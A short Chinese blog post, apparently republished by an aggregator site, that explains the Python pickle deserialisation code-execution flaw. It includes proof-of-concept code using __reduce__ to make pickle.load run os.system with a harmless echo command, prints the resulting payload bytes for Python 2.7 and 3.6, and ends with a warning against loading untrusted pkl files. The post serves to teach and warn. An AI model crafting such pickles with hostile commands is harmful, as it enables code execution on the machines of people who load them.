我們通常使用pickle將python對象序列化，但是pickle在加載時有一個副作用就是它會自動加載相應模塊并構造實例對象。這樣就造成了一個很危險的代碼，如果被黑客利用的話會造成非常嚴重的后果。

我首先在python2.7下測試，通過如下代碼生成payload

import pickle import os class gen(object):def __reduce__(self):s = """echo test > payload.txt""" return os.system, (s,) p = gen() payload = pickle.dumps(p) with open('payload.pkl', 'wb') as f:f.write(payload)

輸出的payload是這樣的

cnt system p1 (S'echo test > payload.txt' p2 tRp3 .

我們通過如下代碼去執行payload

import pickle pickle.load(open('./payload.pkl'))

通過執行上面這個代碼，我們在相同文件夾下生成了payload.txt文件，并且內容是test。

接著我們將上面的測試放到python3.6下面，通過和python2.7下面相同的代碼生成payload

€cnt system q X echo test > payload.txtq卶Rq.

我們通過如下代碼去執行payload

import pickle pickle.load(open('./payload.pkl', 'rb'))

通過執行上面這個代碼，我們得到了和python2.7下面相同的結果。

也就是說，只要在我們編寫的代碼中有打開pkl文件操作的代碼存在的話，那么都會出現上述的問題。你可以想象到，這是多么危險的一件事情。所以這就要求我們在編寫代碼時，不要隨便打開不知名的pkl文件。

總結

以上是生活随笔為你收集整理的Python Pickle任意代码执行漏洞的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。